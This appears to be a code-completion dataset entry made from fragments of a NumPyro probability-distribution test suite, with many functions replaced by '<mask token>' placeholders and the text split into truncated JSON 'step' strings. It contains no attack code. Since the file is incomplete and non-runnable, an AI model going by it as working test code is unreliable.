assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\n<mask token>\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\n<mask token>\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\n<mask token>\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\n<mask token>\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\n<mask token>\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\n<mask token>\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-2": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\n<mask token>\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\n<mask token>\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=\n validate_args)\n\n\n<mask token>\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n 